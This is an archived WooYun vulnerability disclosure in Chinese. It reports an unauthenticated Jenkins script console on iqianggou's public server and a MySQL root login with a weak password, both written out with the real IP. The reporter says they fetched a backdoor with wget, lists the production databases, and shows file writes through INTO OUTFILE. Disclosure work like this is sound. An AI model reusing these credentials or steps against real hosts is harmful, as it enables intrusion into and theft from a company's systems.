当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130879

漏洞标题:iqianggou服务配置不当getshell可内网漫游

相关厂商:上海多维度网络科技有限公司

漏洞作者: new

提交时间:2015-08-07 10:18

修复时间:2015-09-21 10:20

公开时间:2015-09-21 10:20

漏洞类型:网络未授权访问

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-09-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://27.115.51.166/script
命令执行,虽然是jenkins用户,但是有可写目录 /data

1234.png


使用wget从网上下载一个后门脚本再跑起来,一切都OK了

12.png


不对,地址里边好像还有其它的东东,什么192、172、10,你懂的
后续影响有点严重,就不再深入,没有任何恶意操作

漏洞证明:

mysql -u root -p123456 -h 27.115.51.166
Warning: Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 218
Server version: 5.6.23-72.1 Percona Server (GPL), Release 72.1, Revision 0503478
Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+----------------------------+
| Database |
+----------------------------+
| information_schema |
| backup_iqg_new_dev_0601 |
| backup_iqg_new_prod |
| edusoho |
| employees |
| ezpublish |
| fff |
| fs |
| iqg_64832_all |
| iqg_dev |
| iqg_main |
| iqg_main_staging |
| iqg_manage_back |
| iqg_new_dev_0601 |
| iqg_new_prod_0601 |
| iqg_prod_102275 |
| iqg_prod_68514 |
| iqg_prod_back |
| iqg_staging |
| iqg_staging_150302_old_bak |
| iqg_stats_backup |
| iqianggou_old |
| kunstmaanbundles |
| mydb |
| mysql |
| performance_schema |
| scourgen_test |
| scourgen_test_1 |
| sonata_sandbox |
| test |
+----------------------------+
30 rows in set (0.05 sec)


好多数据,而且可以写文件
看如下:
mysql> select 'this is a test,please give 20 rank' into outfile '/data/test.txt';
Query OK, 1 row affected (0.07 sec)
mysql>
/data/test.txt 请自行删除
下图证明问题:
mysql> select load_file('/data/test.txt');
+-------------------------------------+
| load_file('/data/test.txt') |
+-------------------------------------+
| this is a test,please give 20 rank
|
+-------------------------------------+
1 row in set (0.05 sec)
mysql>

修复方案:

不用的系统删除
看到给别人礼物了,连着找了两个搞危害的,不知道有没有我的
我想每个漏洞要20rank不过分吧

版权声明:转载请注明来源 new@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论